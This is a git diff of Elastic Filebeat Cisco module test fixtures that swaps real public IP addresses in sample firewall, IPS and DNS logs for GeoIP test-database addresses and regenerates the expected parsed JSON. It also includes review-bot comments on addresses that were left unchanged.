@@ -798,7 +760,7 @@ "http.response.status_code": "200", "input.type": "log", "log.level": "alert", - "log.offset": 4442, + "log.offset": 4452, "network.application": "curl", "network.community_id": "1:TE/czajXLfyOntGRUMlWpOamN+I=", "network.iana_number": 6, @@ -894,7 +856,7 @@ "host.hostname": "firepower", "input.type": "log", "log.level": "alert", - "log.offset": 5177, + "log.offset": 5187, "network.community_id": "1:Lc5Ybc+aBSwS/2nqgn+rGxqrgck=", "network.iana_number": 1, "network.transport": "icmp", @@ -996,7 +958,7 @@ "http.response.status_code": "200", "input.type": "log", "log.level": "alert", - "log.offset": 5719, + "log.offset": 5729, "network.application": "curl", "network.community_id": "1:EX7LDhHq0D9ez/OeVOOW5FWakkI=", "network.iana_number": 6, diff --git a/x-pack/filebeat/module/cisco/ftd/test/security-file-malware.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/security-file-malware.log-expected.json index 3dcdb4f42197..f6c2477ce209 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/security-file-malware.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/security-file-malware.log-expected.json @@ -618,16 +618,6 @@ "cisco.ftd.security.user": "No Authentication Required", "cisco.ftd.threat_category": "Win.Ransomware.Eicar::95.sbx.tg", "destination.address": "213.211.198.62", - "destination.as.number": 43341, - "destination.as.organization.name": "MDlink online service center GmbH", - "destination.geo.city_name": "Magdeburg", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "DE", - "destination.geo.country_name": "Germany", - "destination.geo.location.lat": 52.1333, - "destination.geo.location.lon": 11.6167, - "destination.geo.region_iso_code": "DE-ST", - "destination.geo.region_name": "Saxony-Anhalt", "destination.ip": "213.211.198.62", "destination.port": 80, "event.action": "malware-detected", 
@@ -810,16 +800,8 @@ "cisco.ftd.threat_category": "Pdf.Exploit.Pdfka::100.sbx.tg", "cisco.ftd.threat_level": "100", "destination.address": "18.197.225.123", - "destination.as.number": 16509, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Frankfurt am Main", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "DE", - "destination.geo.country_name": "Germany", - "destination.geo.location.lat": 50.1188, - "destination.geo.location.lon": 8.6843, - "destination.geo.region_iso_code": "DE-HE", - "destination.geo.region_name": "Hesse", + "destination.as.number": 3, + "destination.as.organization.name": "Massachusetts Institute of Technology", "destination.ip": "18.197.225.123", "destination.port": 80, "event.action": "malware-detected", diff --git a/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log b/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log index 3caf6780a5c8..1e1c6f2c86d3 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log +++ b/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log 
@@ -1 +1 @@
-2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 3.3.3.3, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico
+2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 89.160.20.112, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, 
IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico
diff --git a/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log-expected.json
index eeb9024fdc4e..0d16d6601558 100644
--- a/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log-expected.json
+++ b/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log-expected.json
@@ -32,21 +32,14 @@
 "cisco.ftd.security.responder_bytes": "246",
 "cisco.ftd.security.responder_packets": "4",
 "cisco.ftd.security.sec_int_matching_ip": "Destination",
- "cisco.ftd.security.src_ip": "3.3.3.3",
+ "cisco.ftd.security.src_ip": "89.160.20.112",
 "cisco.ftd.security.src_port": "65090",
 "cisco.ftd.security.url": "http://bad-malwaresite-grr.info/favicon.ico",
 "cisco.ftd.security.user": "No Authentication Required",
 "cisco.ftd.security.user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36",
 "cisco.ftd.source_interface": "s1p1",
 "destination.address": "2.2.2.2",
- "destination.as.number": 3215,
- "destination.as.organization.name": "Orange",
 "destination.bytes": 246,
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "FR",
- "destination.geo.country_name": "France",
- "destination.geo.location.lat": 48.8582,
- "destination.geo.location.lon": 2.3387,
 "destination.ip": "2.2.2.2",
 "destination.packets": 4,
 "destination.port": 80,
@@ -60,7 +53,7 @@ "event.end": "2020-02-29T23:02:36.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 3.3.3.3, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", + "event.original": "%NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 89.160.20.112, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: 
State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", "event.outcome": "success", "event.severity": 0, "event.start": "2020-03-01T01:02:16.000Z", @@ -77,7 +70,7 @@ "log.level": "unknown", "log.offset": 0, "network.application": "chrome", - "network.community_id": "1:IpM6MLWKXk42SgVki5Wy5/6cTfk=", + "network.community_id": "1:9UXIl9ZBksJ4Vl2PAzqL6hYL548=", "network.iana_number": 6, "network.protocol": "http", "network.transport": "tcp", @@ -95,23 +88,25 @@ ], "related.ip": [ "2.2.2.2", - "3.3.3.3" + "89.160.20.112" ], "related.user": [ "No Authentication Required" ], "service.type": "cisco", - "source.address": "3.3.3.3", + "source.address": "89.160.20.112", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", "source.bytes": 729, - "source.geo.city_name": "Seattle", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 47.6348, - "source.geo.location.lon": -122.3451, - "source.geo.region_iso_code": "US-WA", - "source.geo.region_name": "Washington", - "source.ip": "3.3.3.3", + "source.geo.city_name": "Link\u00f6ping", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "source.packets": 4, "source.port": 65090, "tags": [ diff --git a/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log b/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log index fe309a798a5c..4fa9262cec7f 100644 --- a/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log 
+++ b/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log
@@ -22,8 +22,8 @@ Jun 20 02:42:58 198.51.100.2 1663319: Jun 20 02:42:57.340: %SEC-6-IPACCESSLOGP:
 Jun 20 02:43:04 198.51.100.2 1663320: Jun 20 02:43:03.346: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(58393) -> 198.51.100.255(15600), 1 packet
 Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -> 172.217.10.46(80), 1 packet
 Jun 20 02:43:16 198.51.100.2 1663322: Jun 20 02:43:15.350: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(60908) -> 198.51.100.255(15600), 1 packet
-Jun 20 02:43:20 198.51.100.2 1663323: Jun 20 02:43:20.346: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(59415) -> 8.8.8.8(53), 1 packet
-Jun 20 02:43:22 198.51.100.2 1663324: Jun 20 02:43:21.348: %SEC-6-IPACCESSLOGP: list 177 denied udp 8.8.8.8(53) -> 198.51.100.195(59415), 1 packet
+Jun 20 02:43:20 198.51.100.2 1663323: Jun 20 02:43:20.346: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(59415) -> 175.16.199.1(53), 1 packet
+Jun 20 02:43:22 198.51.100.2 1663324: Jun 20 02:43:21.348: %SEC-6-IPACCESSLOGP: list 177 denied udp 175.16.199.1(53) -> 198.51.100.195(59415), 1 packet
 Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets
 Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -> 198.51.100.1 (3/3), 32 packets
 Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -> 172.217.10.46(80), 1 packet
diff --git a/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log-expected.json b/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log-expected.json
index f606b5249ed6..8b6c3188a7d2 100644
--- a/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log-expected.json
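Review bot: The substitution stops at the 8.8.8.8 pair; `172.217.10.46` is still the destination on the `list 150 denied tcp` context lines here, and the regenerated expectation in the next section drops its `destination.as.*` (AS 15169 "Google LLC") and `destination.geo.*` fields in every one of those events, so they now go unenriched and a real operator's address remains in the sample. If the move to 175.16.199.1 is meant to keep the fixture inside the GeoLite2 test set, apply the same rule to that address and regenerate, e.g. `... list 150 denied tcp 198.51.100.12(59832) -> 89.160.20.112(80), 1 packet` (89.160.20.112 already resolves on this page). The rest of this file lies outside the hunk, so other occurrences would need the same pass.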
+++ b/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log-expected.json @@ -327,13 +327,6 @@ "cisco.ios.access_list": "150", "cisco.ios.facility": "SEC", "destination.address": "172.217.10.46", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.10.46", "destination.port": 80, "event.category": [ @@ -825,13 +818,6 @@ "cisco.ios.access_list": "150", "cisco.ios.facility": "SEC", "destination.address": "172.217.10.46", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.10.46", "destination.port": 80, "event.category": [ @@ -1020,13 +1006,6 @@ "cisco.ios.access_list": "150", "cisco.ios.facility": "SEC", "destination.address": "172.217.10.46", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.10.46", "destination.port": 80, "event.category": [ 
@@ -1120,15 +1099,16 @@ { "cisco.ios.access_list": "177", "cisco.ios.facility": "SEC", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.address": "175.16.199.1", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.port": 53, "event.category": [ "network", @@ -1138,7 +1118,7 @@ "event.dataset": "cisco.ios", "event.kind": "event", "event.module": "cisco", - "event.original": "Jun 20 02:43:20 198.51.100.2 1663323: Jun 20 02:43:20.346: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(59415) -> 8.8.8.8(53), 1 packet", + "event.original": "Jun 20 02:43:20 198.51.100.2 1663323: Jun 20 02:43:20.346: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(59415) -> 175.16.199.1(53), 1 packet", "event.outcome": "deny", "event.sequence": 1663323, "event.severity": 6, 
@@ -1152,14 +1132,14 @@ "log.level": "informational", "log.offset": 3696, "log.source.address": "198.51.100.2", - "message": "list 177 denied udp 198.51.100.195(59415) -> 8.8.8.8(53), 1 packet", - "network.community_id": "1:h/uFabgjBwU5mrrtpdTxxrh73yI=", + "message": "list 177 denied udp 198.51.100.195(59415) -> 175.16.199.1(53), 1 packet", + "network.community_id": "1:6L/2xZjl1dnrNbgNmPYhxb9SVmQ=", "network.packets": 1, "network.transport": "udp", "network.type": "ipv4", "related.ip": [ - "198.51.100.195", - "8.8.8.8" + "175.16.199.1", + "198.51.100.195" ], "service.type": "cisco", "source.address": "198.51.100.195", @@ -1185,7 +1165,7 @@ "event.dataset": "cisco.ios", "event.kind": "event", "event.module": "cisco", - "event.original": "Jun 20 02:43:22 198.51.100.2 1663324: Jun 20 02:43:21.348: %SEC-6-IPACCESSLOGP: list 177 denied udp 8.8.8.8(53) -> 198.51.100.195(59415), 1 packet", + "event.original": "Jun 20 02:43:22 198.51.100.2 1663324: Jun 20 02:43:21.348: %SEC-6-IPACCESSLOGP: list 177 denied udp 175.16.199.1(53) -> 198.51.100.195(59415), 1 packet", "event.outcome": "deny", "event.sequence": 1663324, "event.severity": 6, 
@@ -1197,27 +1177,28 @@ "fileset.name": "ios", "input.type": "log", "log.level": "informational", - "log.offset": 3843, + "log.offset": 3848, "log.source.address": "198.51.100.2", - "message": "list 177 denied udp 8.8.8.8(53) -> 198.51.100.195(59415), 1 packet", - "network.community_id": "1:h/uFabgjBwU5mrrtpdTxxrh73yI=", + "message": "list 177 denied udp 175.16.199.1(53) -> 198.51.100.195(59415), 1 packet", + "network.community_id": "1:6L/2xZjl1dnrNbgNmPYhxb9SVmQ=", "network.packets": 1, "network.transport": "udp", "network.type": "ipv4", "related.ip": [ - "198.51.100.195", - "8.8.8.8" + "175.16.199.1", + "198.51.100.195" ], "service.type": "cisco", - "source.address": "8.8.8.8", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "8.8.8.8", + "source.address": "175.16.199.1", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "source.packets": 1, "source.port": 53, "tags": [ @@ -1237,7 +1218,7 @@ "fileset.name": "ios", "input.type": "log", "log.level": "informational", - "log.offset": 3990, + "log.offset": 4000, "log.source.address": "198.51.100.2", "message": "access-list logging rate-limited or missed 23 packets", "service.type": "cisco", 
@@ -1273,7 +1254,7 @@ "icmp.type": "3", "input.type": "log", "log.level": "informational", - "log.offset": 4125, + "log.offset": 4135, "log.source.address": "198.51.100.2", "message": "list 150 denied icmp 198.51.100.12 -> 198.51.100.1 (3/3), 32 packets", "network.community_id": "1:huj4hjTG/rbN+R5GhpV6YHP1sYM=", @@ -1297,13 +1278,6 @@ "cisco.ios.access_list": "150", "cisco.ios.facility": "SEC", "destination.address": "172.217.10.46", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.10.46", "destination.port": 80, "event.category": [ @@ -1326,7 +1300,7 @@ "fileset.name": "ios", "input.type": "log", "log.level": "informational", - "log.offset": 4275, + "log.offset": 4285, "log.source.address": "198.51.100.2", "message": "list 150 denied tcp 198.51.100.12(59834) -> 172.217.10.46(80), 1 packet", "network.community_id": "1:5enMmUgQViWG28IC5W6/9cYJ6EA=", @@ -1373,7 +1347,7 @@ "fileset.name": "ios", "input.type": "log", "log.level": "informational", - "log.offset": 4427, + "log.offset": 4437, "log.source.address": "198.51.100.2", "message": "list 177 denied udp 198.51.100.195(54532) -> 198.51.100.255(15600), 1 packet", "network.community_id": "1:HW2UVF4QjZyP0WvOCPDC/SaLeM4=", @@ -1420,7 +1394,7 @@ "fileset.name": "ios", "input.type": "log", "log.level": "informational", - "log.offset": 4584, + "log.offset": 4594, "log.source.address": "198.51.100.2", "message": "list 177 denied udp 198.51.100.195(57831) -> 198.51.100.255(15600), 1 packet", "network.community_id": "1:wnyoad/xLJtzSkYMtkPdjPFtcbY=", 
@@ -1467,7 +1441,7 @@ "fileset.name": "ios", "input.type": "log", "log.level": "informational", - "log.offset": 4741, + "log.offset": 4751, "log.source.address": "198.51.100.2", "message": "list 150 denied udp 198.51.100.20(138) -> 198.51.100.255(138), 1 packet", "network.community_id": "1:20RnUEbnGL+QfL5tp+byZIdFKiE=", @@ -1514,7 +1488,7 @@ "fileset.name": "ios", "input.type": "log", "log.level": "informational", - "log.offset": 4893, + "log.offset": 4903, "log.source.address": "198.51.100.2", "message": "list 177 denied udp 198.51.100.195(42988) -> 198.51.100.255(15600), 1 packet", "network.community_id": "1:+vR7H9Spa/zExAcx4hOFskroCOY=", @@ -1539,13 +1513,6 @@ "cisco.ios.access_list": "150", "cisco.ios.facility": "SEC", "destination.address": "172.217.10.46", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.10.46", "destination.port": 80, "event.category": [ @@ -1568,7 +1535,7 @@ "fileset.name": "ios", "input.type": "log", "log.level": "informational", - "log.offset": 5050, + "log.offset": 5060, "log.source.address": "198.51.100.2", "message": "list 150 denied tcp 198.51.100.12(59836) -> 172.217.10.46(80), 1 packet", "network.community_id": "1:cfXjAByFKHEuSoPPIRx01/7LC0Q=", diff --git a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log index f776f71c60db..f88c691e6c80 100644 --- a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log +++ b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log 
@@ -1,3 +1,3 @@
-"2020-07-23 23:49:54","elasticuser","elasticuser2","some other identity","192.168.1.1","8.8.8.8","Allowed","1 (A)","NOERROR","elastic.co.","Software/Technology,Business Services,Application","Test Policy Name","SomeIdentityType",""
+"2020-07-23 23:49:54","elasticuser","elasticuser2","some other identity","192.168.1.1","175.16.199.1","Allowed","1 (A)","NOERROR","elastic.co.","Software/Technology,Business Services,Application","Test Policy Name","SomeIdentityType",""
 "2020-07-23 23:50:25","elasticuser","elasticuser2","some other identity","192.168.1.1","4.4.4.4","Blocked","1 (A)","NOERROR","elastic.co/something.","Chat,Instant Messaging,Block List,Application","Test Policy Name","SomeIdentityType","BlockedCategories"
-"2021-05-14 19:39:58","elastic_machine","elastic_machine,Elastic User (ElasticUser@elastic.co)","1.1.1.1","2.2.2.2","Allowed","1 (A)","NOERROR","elastic.co.","Infrastructure","Roaming Computers","Roaming Computers,AD Users",""
+"2021-05-14 19:39:58","elastic_machine","elastic_machine,Elastic User (ElasticUser@elastic.co)","89.160.20.156","2.2.2.2","Allowed","1 (A)","NOERROR","elastic.co.","Infrastructure","Roaming Computers","Roaming Computers,AD Users",""
diff --git a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log-expected.json b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log-expected.json
index 0d49c1443565..6833ac5cd8f7 100644
--- a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log-expected.json
+++ b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log-expected.json
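Review bot: The middle record (the unchanged `"Blocked"` line) still carries `4.4.4.4` in the external-address field, and the third record keeps `2.2.2.2`, so after this change the fixture mixes test-database addresses with public ones that, as far as this page shows, are not resolved by the test database and appear to be real routable addresses. The ios fixture in this same diff uses RFC 5737 documentation space (`198.51.100.x`) for addresses that need no enrichment; either that or another address the page already shows resolving would be consistent here, e.g. `"192.168.1.1","175.16.199.1","Blocked"` on the second record. Regenerate the expected file afterwards, since `event.action` is derived from this field (`dns-request-175.16.199.1` in the next section).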
@@ -14,18 +14,18 @@ "dns.question.type": "Allowed", "dns.response_code": "1 (A)", "dns.type": "query", - "event.action": "dns-request-8.8.8.8", + "event.action": "dns-request-175.16.199.1", "event.category": "network", "event.dataset": "cisco.umbrella", "event.module": "cisco", - "event.original": "\\\"2020-07-23 23:49:54\\\",\\\"elasticuser\\\",\\\"elasticuser2\\\",\\\"some other identity\\\",\\\"192.168.1.1\\\",\\\"8.8.8.8\\\",\\\"Allowed\\\",\\\"1 (A)\\\",\\\"NOERROR\\\",\\\"elastic.co.\\\",\\\"Software/Technology,Business Services,Application\\\",\\\"Test Policy Name\\\",\\\"SomeIdentityType\\\",\\\"\\\"", + "event.original": "\\\"2020-07-23 23:49:54\\\",\\\"elasticuser\\\",\\\"elasticuser2\\\",\\\"some other identity\\\",\\\"192.168.1.1\\\",\\\"175.16.199.1\\\",\\\"Allowed\\\",\\\"1 (A)\\\",\\\"NOERROR\\\",\\\"elastic.co.\\\",\\\"Software/Technology,Business Services,Application\\\",\\\"Test Policy Name\\\",\\\"SomeIdentityType\\\",\\\"\\\"", "event.type": [ "connection" ], "fileset.name": "umbrella", "input.type": "log", "log.offset": 0, - "message": "\"2020-07-23 23:49:54\",\"elasticuser\",\"elasticuser2\",\"some other identity\",\"192.168.1.1\",\"8.8.8.8\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Software/Technology,Business Services,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"\"", + "message": "\"2020-07-23 23:49:54\",\"elasticuser\",\"elasticuser2\",\"some other identity\",\"192.168.1.1\",\"175.16.199.1\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Software/Technology,Business Services,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"\"", "observer.product": "Umbrella", "observer.type": "dns", "observer.vendor": "Cisco", 
@@ -69,7 +69,7 @@ ], "fileset.name": "umbrella", "input.type": "log", - "log.offset": 232, + "log.offset": 237, "message": "\"2020-07-23 23:50:25\",\"elasticuser\",\"elasticuser2\",\"some other identity\",\"192.168.1.1\",\"4.4.4.4\",\"Blocked\",\"1 (A)\",\"NOERROR\",\"elastic.co/something.\",\"Chat,Instant Messaging,Block List,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"BlockedCategories\"", "observer.product": "Umbrella", "observer.type": "dns", @@ -108,15 +108,15 @@ "event.category": "network", "event.dataset": "cisco.umbrella", "event.module": "cisco", - "event.original": "\\\"2021-05-14 19:39:58\\\",\\\"elastic_machine\\\",\\\"elastic_machine,Elastic User (ElasticUser@elastic.co)\\\",\\\"1.1.1.1\\\",\\\"2.2.2.2\\\",\\\"Allowed\\\",\\\"1 (A)\\\",\\\"NOERROR\\\",\\\"elastic.co.\\\",\\\"Infrastructure\\\",\\\"Roaming Computers\\\",\\\"Roaming Computers,AD Users\\\",\\\"\\\"", + "event.original": "\\\"2021-05-14 19:39:58\\\",\\\"elastic_machine\\\",\\\"elastic_machine,Elastic User (ElasticUser@elastic.co)\\\",\\\"89.160.20.156\\\",\\\"2.2.2.2\\\",\\\"Allowed\\\",\\\"1 (A)\\\",\\\"NOERROR\\\",\\\"elastic.co.\\\",\\\"Infrastructure\\\",\\\"Roaming Computers\\\",\\\"Roaming Computers,AD Users\\\",\\\"\\\"", "event.type": [ "allowed", "connection" ], "fileset.name": "umbrella", "input.type": "log", - "log.offset": 487, - "message": "\"2021-05-14 19:39:58\",\"elastic_machine\",\"elastic_machine,Elastic User (ElasticUser@elastic.co)\",\"1.1.1.1\",\"2.2.2.2\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Infrastructure\",\"Roaming Computers\",\"Roaming Computers,AD Users\",\"\"", + "log.offset": 492, + "message": "\"2021-05-14 19:39:58\",\"elastic_machine\",\"elastic_machine,Elastic User (ElasticUser@elastic.co)\",\"89.160.20.156\",\"2.2.2.2\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Infrastructure\",\"Roaming Computers\",\"Roaming Computers,AD Users\",\"\"", "observer.product": "Umbrella", "observer.type": "dns", "observer.vendor": "Cisco", 
@@ -124,16 +124,16 @@
 "elastic.co."
 ],
 "related.ip": [
- "1.1.1.1",
- "2.2.2.2"
+ "2.2.2.2",
+ "89.160.20.156"
 ],
 "related.user": [
 "Elastic User (ElasticUser@elastic.co)",
 "elastic_machine"
 ],
 "service.type": "cisco",
- "source.address": "1.1.1.1",
- "source.ip": "1.1.1.1",
+ "source.address": "89.160.20.156",
+ "source.ip": "89.160.20.156",
 "source.user.name": "elastic_machine"
 }
 ]
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log
index 6200aeab3ae3..a58dc713face 100644
